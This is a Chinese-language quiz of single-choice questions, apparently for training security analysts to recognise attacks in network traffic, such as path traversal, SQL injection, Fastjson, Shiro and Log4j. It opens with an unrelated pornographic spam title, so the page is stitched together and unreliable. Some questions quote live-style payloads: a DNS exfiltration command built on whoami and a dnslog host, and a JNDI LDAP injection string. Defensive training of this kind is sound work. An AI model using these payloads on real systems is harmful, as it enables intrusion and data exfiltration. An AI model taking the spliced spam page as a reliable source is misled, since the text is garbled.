OL丝袜无码15P,国产粉嫩在线

單項選擇題攻擊數據包中出現多個"../"字樣，則最有可能是攻擊者進行哪項漏洞攻擊（）

A.xss漏洞攻擊
B.xml注入漏洞攻擊
C.命令執(zhí)行漏洞攻擊
D.任意文件讀取

1.單項選擇題網絡攻擊數據包中，存在"Acunetix"字樣，可以判斷出此款漏掃掃描器為（）

A.AppScan
B.Awvs
C.xray
D.burp

2.單項選擇題網絡數據包中出現ping `whoami`.aaa.dnslog.com，攻擊者最有可能的目的是哪項（）

A.xss漏洞攻擊
B.單純執(zhí)行ping命令
C.把whoami命令執(zhí)行結果，通過dns域名顯示出來
D.SQL注入漏洞攻擊

3.單項選擇題網絡數據包中出現新增jsp、php、aspx腳本語言文件的加密流量，說明攻擊者有可能正在進行哪項操作（）

A.正常請求訪問
B.連接webshell進行服務器操作
C.漏洞掃描

4.單項選擇題網絡數據包中出現wget、curl等字眼時，說明攻擊者最有可能采取以下哪種漏洞攻擊（）

A.xss漏洞攻擊
B.xml注入漏洞攻擊
C.命令執(zhí)行漏洞攻擊
D.SQL注入漏洞攻擊

5.單項選擇題在攻擊數據包中，出現select、database（）、user（）、version（）等字眼，可能是以下哪種攻擊（）

A.xss漏洞攻擊
B.ssrf漏洞攻擊
C.文件上傳漏洞攻擊
D.SQL注入漏洞攻擊

6.單項選擇題在攻擊數據包中，出現@type的字眼，可能是以下哪種攻擊（）

A.ssrf漏洞攻擊
B.Log4j漏洞攻擊
C.csrf漏洞攻擊
D.Fastjson漏洞攻擊

7.單項選擇題數據包Cookie中帶有rememberMe字樣，說明此系統最有可能使用了什么框架組件（）

A.Fastjson
B.Log4j
C.Spring
D.Shiro

8.單項選擇題通過以下哪個平臺，可以在不對攻擊IP進行端口掃描的前提下，初步獲取到該IP的端資產信息（）

A.virustotal
B.fofa
C.DNSlog平臺

9.單項選擇題以下哪種方式可以加快溯源到攻擊者的社交軟件ID（）

A.部署WAF
B.部署IPS
C.部署蜜罐
D.部署防火墻

10.單項選擇題在攻擊數據包中，出現${jndi：ldap：//111.xxx.io}的字眼，可能是以下哪種攻擊（）

A.ssrf漏洞攻擊
B.Log4j漏洞攻擊
C.csrf漏洞攻擊
D.SQL注入漏洞攻擊